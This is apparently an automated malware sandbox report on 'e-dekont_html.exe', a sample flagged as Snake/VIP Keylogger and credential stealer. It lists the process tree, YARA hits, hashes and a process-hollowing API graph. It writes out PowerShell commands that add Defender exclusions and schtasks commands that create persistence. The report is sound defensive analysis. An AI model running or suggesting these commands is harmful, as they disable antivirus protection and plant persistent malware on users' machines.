                                                                                                                                                        2024-11-20 06:52:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:01:52:04
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:01:52:07
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:01:52:07
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:52:10
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        Imagebase:0x8e0000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                        • Detection: 67%, Virustotal, Browse
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:52:12
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:01:52:14
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:01:52:14
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:01:52:15
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                                                                                                                                                        Imagebase:0xdd0000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:11.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:184
                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                          execution_graph 31307 12b4668 31308 12b467a 31307->31308 31309 12b4686 31308->31309 31311 12b4779 31308->31311 31312 12b479d 31311->31312 31316 12b4879 31312->31316 31320 12b4888 31312->31320 31318 12b48af 31316->31318 31317 12b498c 31317->31317 31318->31317 31324 12b44b4 31318->31324 31322 12b48af 31320->31322 31321 12b498c 31321->31321 31322->31321 31323 12b44b4 CreateActCtxA 31322->31323 31323->31321 31325 12b5918 CreateActCtxA 31324->31325 31327 12b59db 31325->31327 31536 12baf58 31537 12baf9a 31536->31537 31538 12bafa0 GetModuleHandleW 31536->31538 31537->31538 31539 12bafcd 31538->31539 31328 76b1ae0 31329 76b17ec 31328->31329 31329->31328 31330 76b1a3c 31329->31330 31334 76b4228 31329->31334 31351 76b429e 31329->31351 31369 76b4238 31329->31369 31335 76b422c 31334->31335 31343 76b425a 31335->31343 31386 76b464b 31335->31386 31391 76b4d75 31335->31391 31396 76b4bdc 31335->31396 31401 76b48ff 31335->31401 31409 76b4858 31335->31409 31413 76b4a5a 31335->31413 31417 76b4dfb 31335->31417 31422 76b4664 31335->31422 31427 76b4726 31335->31427 31432 76b4822 31335->31432 31438 76b4fae 31335->31438 31442 76b49c8 31335->31442 31447 76b4b28 31335->31447 31452 76b4c49 31335->31452 31343->31330 31352 76b422c 31351->31352 31353 76b42a1 31351->31353 31354 76b425a 31352->31354 31355 76b464b 2 API calls 31352->31355 31356 76b4c49 2 API calls 31352->31356 31357 76b4b28 2 API calls 31352->31357 31358 76b49c8 2 API calls 31352->31358 31359 76b4fae 2 API calls 31352->31359 31360 76b4822 2 API calls 31352->31360 31361 76b4726 2 API calls 31352->31361 31362 76b4664 2 API calls 31352->31362 31363 76b4dfb 2 API calls 31352->31363 31364 76b4a5a 2 API calls 31352->31364 31365 76b4858 2 API calls 31352->31365 31366 76b48ff 4 API calls 31352->31366 31367 76b4bdc 2 API calls 31352->31367 31368 76b4d75 2 API calls 31352->31368 31353->31330 31354->31330 31355->31354 31356->31354 31357->31354 31358->31354 31359->31354 31360->31354 31361->31354 31362->31354 31363->31354 31364->31354 31365->31354 31366->31354 31367->31354 31368->31354 31370 76b423d 31369->31370 31371 76b464b 2 API calls 31370->31371 31372 76b4c49 2 API calls 31370->31372 31373 76b4b28 2 API calls 31370->31373 31374 76b49c8 2 API calls 31370->31374 31375 76b4fae 2 API calls 31370->31375 31376 76b4822 2 API calls 31370->31376 31377 76b4726 2 API calls 31370->31377 31378 76b425a 31370->31378 31379 76b4664 2 API calls 31370->31379 31380 76b4dfb 2 API calls 31370->31380 31381 76b4a5a 2 API calls 31370->31381 31382 76b4858 2 API calls 31370->31382 31383 76b48ff 4 API calls 31370->31383 31384 76b4bdc 2 API calls 31370->31384 31385 76b4d75 2 API calls 31370->31385 31371->31378 31372->31378 31373->31378 31374->31378 31375->31378 31376->31378 31377->31378 31378->31330 31379->31378 31380->31378 31381->31378 31382->31378 31383->31378 31384->31378 31385->31378 31387 76b469d 31386->31387 31388 76b475d 31387->31388 31457 76b13d0 31387->31457 31461 76b13c4 31387->31461 31388->31343 31392 76b4de6 31391->31392 31465 76b1148 31392->31465 31469 76b1141 31392->31469 31393 76b5030 31397 76b4be8 31396->31397 31399 76b1148 WriteProcessMemory 31397->31399 31400 76b1141 WriteProcessMemory 31397->31400 31398 76b5073 31399->31398 31400->31398 31402 76b4992 31401->31402 31473 76b1088 31402->31473 31477 76b1081 31402->31477 31403 76b49b0 31407 76b1148 WriteProcessMemory 31403->31407 31408 76b1141 WriteProcessMemory 31403->31408 31404 76b5030 31407->31404 31408->31404 31411 76b1148 WriteProcessMemory 31409->31411 31412 76b1141 WriteProcessMemory 31409->31412 31410 76b484c 31410->31343 31411->31410 31412->31410 31481 76b1238 31413->31481 31485 76b1230 31413->31485 31414 76b47b6 31414->31343 31489 76b5440 31417->31489 31494 76b5430 31417->31494 31418 76b4d76 31418->31417 31419 76b4e70 31418->31419 31419->31343 31423 76b4673 31422->31423 31424 76b475d 31423->31424 31425 76b13d0 CreateProcessA 31423->31425 31426 76b13c4 CreateProcessA 31423->31426 31424->31343 31425->31424 31426->31424 31428 76b472c 31427->31428 31430 76b13d0 CreateProcessA 31428->31430 31431 76b13c4 CreateProcessA 31428->31431 31429 76b475d 31429->31343 31430->31429 31431->31429 31433 76b4fbb 31432->31433 31434 76b482f 31432->31434 31435 76b4fd6 31433->31435 31436 76b0b78 Wow64SetThreadContext 31433->31436 31437 76b0b70 Wow64SetThreadContext 31433->31437 31436->31435 31437->31435 31440 76b0b78 Wow64SetThreadContext 31438->31440 31441 76b0b70 Wow64SetThreadContext 31438->31441 31439 76b4fd6 31440->31439 31441->31439 31443 76b4a5e 31442->31443 31444 76b47b6 31443->31444 31445 76b1238 ReadProcessMemory 31443->31445 31446 76b1230 ReadProcessMemory 31443->31446 31444->31343 31445->31444 31446->31444 31448 76b4b35 31447->31448 31508 76b0689 31448->31508 31512 76b0690 31448->31512 31449 76b47b6 31449->31343 31453 76b4c4f 31452->31453 31455 76b0689 ResumeThread 31453->31455 31456 76b0690 ResumeThread 31453->31456 31454 76b47b6 31454->31343 31455->31454 31456->31454 31458 76b1459 31457->31458 31458->31458 31459 76b15be CreateProcessA 31458->31459 31460 76b161b 31459->31460 31462 76b13d0 CreateProcessA 31461->31462 31464 76b161b 31462->31464 31464->31464 31466 76b1190 WriteProcessMemory 31465->31466 31468 76b11e7 31466->31468 31468->31393 31470 76b1148 WriteProcessMemory 31469->31470 31472 76b11e7 31470->31472 31472->31393 31474 76b10c8 VirtualAllocEx 31473->31474 31476 76b1105 31474->31476 31476->31403 31478 76b1088 VirtualAllocEx 31477->31478 31480 76b1105 31478->31480 31480->31403 31482 76b1283 ReadProcessMemory 31481->31482 31484 76b12c7 31482->31484 31484->31414 31486 76b1238 ReadProcessMemory 31485->31486 31488 76b12c7 31486->31488 31488->31414 31490 76b5455 31489->31490 31500 76b0b78 31490->31500 31504 76b0b70 31490->31504 31491 76b546b 31491->31418 31495 76b543a 31494->31495 31496 76b5496 31494->31496 31498 76b0b78 Wow64SetThreadContext 31495->31498 31499 76b0b70 Wow64SetThreadContext 31495->31499 31496->31418 31497 76b546b 31497->31418 31498->31497 31499->31497 31501 76b0bbd Wow64SetThreadContext 31500->31501 31503 76b0c05 31501->31503 31503->31491 31505 76b0b78 Wow64SetThreadContext 31504->31505 31507 76b0c05 31505->31507 31507->31491 31509 76b06d0 ResumeThread 31508->31509 31511 76b0701 31509->31511 31511->31449 31513 76b06d0 ResumeThread 31512->31513 31515 76b0701 31513->31515 31515->31449 31516 76b5530 31517 76b56bb 31516->31517 31518 76b5556 31516->31518 31518->31517 31521 76b57b0 PostMessageW 31518->31521 31523 76b57a8 31518->31523 31522 76b581c 31521->31522 31522->31518 31524 76b57b0 PostMessageW 31523->31524 31525 76b581c 31524->31525 31525->31518 31526 12bd000 31527 12bd046 GetCurrentProcess 31526->31527 31529 12bd098 GetCurrentThread 31527->31529 31530 12bd091 31527->31530 31531 12bd0ce 31529->31531 31532 12bd0d5 GetCurrentProcess 31529->31532 31530->31529 31531->31532 31533 12bd10b 31532->31533 31534 12bd133 GetCurrentThreadId 31533->31534 31535 12bd164 31534->31535 31540 12bd650 DuplicateHandle 31541 12bd6e6 31540->31541

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 08F00040 Relevance: 15.6, Strings: 10, Instructions: 3141COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4|kq$4|kq$$fq
                                                                                                                                                          • API String ID: 0-2750812312
                                                                                                                                                          • Opcode ID: b63659728bc559bfb70ac1dc6e5c8ce9a99a79e2c7f1584df11f5600205bb87d
                                                                                                                                                          • Instruction ID: 634f3cc4f07f0ad9594822cdbfb34e119d7e67a4fc1b4d0674512205b4309a72
                                                                                                                                                          • Opcode Fuzzy Hash: b63659728bc559bfb70ac1dc6e5c8ce9a99a79e2c7f1584df11f5600205bb87d
                                                                                                                                                          • Instruction Fuzzy Hash: F0631974A00219CFCB25DF6CC888A9DBBB2BF89311F158599D459AB3A1DB30ED81DF50
                                                                                                                                                          Function 08F034B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1268 8f034b8-8f034e0 1270 8f034e2 1268->1270 1271 8f034e7-8f035a3 1268->1271 1270->1271 1274 8f035a5-8f035cb 1271->1274 1275 8f035a8-8f035b5 1271->1275 1277 8f035d1-8f035fb 1274->1277 1278 8f03abb-8f03afd 1274->1278 1275->1274 1281 8f03601-8f03619 1277->1281 1282 8f03cc8-8f03cd4 1277->1282 1286 8f03b00-8f03b04 1278->1286 1283 8f03cda-8f03ce3 1281->1283 1284 8f0361f-8f03620 1281->1284 1282->1283 1290 8f03ce9-8f03cf5 1283->1290 1287 8f03cae-8f03cba 1284->1287 1288 8f036d6-8f036da 1286->1288 1289 8f03b0a-8f03b10 1286->1289 1291 8f03cc0-8f03cc7 1287->1291 1292 8f03625-8f03631 1287->1292 1294 8f036ec-8f036f2 1288->1294 1295 8f036dc-8f036ea 1288->1295 1289->1278 1293 8f03b12-8f03b6d 1289->1293 1298 8f03cfb-8f03d07 1290->1298 1296 8f03633 1292->1296 1297 8f03638-8f03653 1292->1297 1317 8f03ba4-8f03bce 1293->1317 1318 8f03b6f-8f03ba2 1293->1318 1300 8f03737-8f0373b 1294->1300 1299 8f0374a-8f0377c 1295->1299 1296->1297 1297->1290 1301 8f03659-8f0367e 1297->1301 1305 8f03d0d-8f03d14 1298->1305 1323 8f037a6 1299->1323 1324 8f0377e-8f0378a 1299->1324 1302 8f036f4-8f03700 1300->1302 1303 8f0373d 1300->1303 1301->1298 1315 8f03684-8f03686 1301->1315 1308 8f03702 1302->1308 1309 8f03707-8f0370f 1302->1309 1306 8f03740-8f03744 1303->1306 1306->1299 1311 8f036bc-8f036d3 1306->1311 1308->1309 1313 8f03711-8f03725 1309->1313 1314 8f03734 1309->1314 1311->1288 1316 8f03689-8f03694 1313->1316 1320 8f0372b-8f03732 1313->1320 1314->1300 1315->1316 1316->1305 1321 8f0369a-8f036b7 1316->1321 1332 8f03bd7-8f03c56 1317->1332 1318->1332 1320->1303 1321->1306 1329 8f037ac-8f037d9 1323->1329 1326 8f03794-8f0379a 1324->1326 1327 8f0378c-8f03792 1324->1327 1333 8f037a4 1326->1333 1327->1333 1336 8f03828-8f038bb 1329->1336 1337 8f037db-8f03813 1329->1337 1344 8f03c5d-8f03c70 1332->1344 1333->1329 1352 8f038c4-8f038c5 1336->1352 1353 8f038bd 1336->1353 1345 8f03c7f-8f03c84 1337->1345 1344->1345 1346 8f03c86-8f03c94 1345->1346 1347 8f03c9b-8f03cab 1345->1347 1346->1347 1347->1287 1354 8f03916-8f0391c 1352->1354 1353->1352 1355 8f038c7-8f038e6 1354->1355 1356 8f0391e-8f039e0 1354->1356 1357 8f038e8 1355->1357 1358 8f038ed-8f03913 1355->1358 1367 8f03a21-8f03a25 1356->1367 1368 8f039e2-8f03a1b 1356->1368 1357->1358 1358->1354 1369 8f03a66-8f03a6a 1367->1369 1370 8f03a27-8f03a60 1367->1370 1368->1367 1371 8f03aab-8f03aaf 1369->1371 1372 8f03a6c-8f03aa5 1369->1372 1370->1369 1371->1293 1375 8f03ab1-8f03ab9 1371->1375 1372->1371 1375->1286
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq$:$pjq$~
                                                                                                                                                          • API String ID: 0-2740937384
                                                                                                                                                          • Opcode ID: 3551dcffff4785e4452eee1e2b44396ad83489c32be04c3931692e4c649694d6
                                                                                                                                                          • Instruction ID: 372609cdbf40ff15b8a5ef6df8ece25c702dd45b0d9e7a80ec047aa998858862
                                                                                                                                                          • Opcode Fuzzy Hash: 3551dcffff4785e4452eee1e2b44396ad83489c32be04c3931692e4c649694d6
                                                                                                                                                          • Instruction Fuzzy Hash: 6A42A079A04228DFDB15CFA9C984B99BBB2FF48304F1580E9E509AB361D7319D91DF10
                                                                                                                                                          Function 076B6508 Relevance: .4, Instructions: 403COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 191e39dc6d8c811fd2c048021a63ddfd43670fdd07ad2fc102fd2309826a26cd
                                                                                                                                                          • Instruction ID: 410c45f6c946ca92c8dfb17e732fbdefd9eb22095b9e70eaafe9c02fdb1dfd6b
                                                                                                                                                          • Opcode Fuzzy Hash: 191e39dc6d8c811fd2c048021a63ddfd43670fdd07ad2fc102fd2309826a26cd
                                                                                                                                                          • Instruction Fuzzy Hash: BFE1CAB1B012059FDB29DB79C490BEEB7FAAF8A740F1444ADD1469B390DB31E881CB51
                                                                                                                                                          Function 076B4965 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5ec0d558768920c0ec60961031f26aa01e5a61252f278c378470a2fb60f256ea
                                                                                                                                                          • Instruction ID: 5fdf68647fd95b7f7fc4479e0682e3ee94e9522dd516e1160f3a50f9647fc3fe
                                                                                                                                                          • Opcode Fuzzy Hash: 5ec0d558768920c0ec60961031f26aa01e5a61252f278c378470a2fb60f256ea
                                                                                                                                                          • Instruction Fuzzy Hash: 5FE012F8D5E288CFC7229E6458945F57BBDA74B204F0930EA808BA7253D52545D38B19
                                                                                                                                                          Function 012BCFFA Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1224 12bcffa-12bd08f GetCurrentProcess 1228 12bd098-12bd0cc GetCurrentThread 1224->1228 1229 12bd091-12bd097 1224->1229 1230 12bd0ce-12bd0d4 1228->1230 1231 12bd0d5-12bd109 GetCurrentProcess 1228->1231 1229->1228 1230->1231 1233 12bd10b-12bd111 1231->1233 1234 12bd112-12bd12d call 12bd5d9 1231->1234 1233->1234 1237 12bd133-12bd162 GetCurrentThreadId 1234->1237 1238 12bd16b-12bd1cd 1237->1238 1239 12bd164-12bd16a 1237->1239 1239->1238
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 012BD07E
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 012BD0BB
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 012BD0F8
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012BD151
                                                                                                                                                          Memory Dump Source
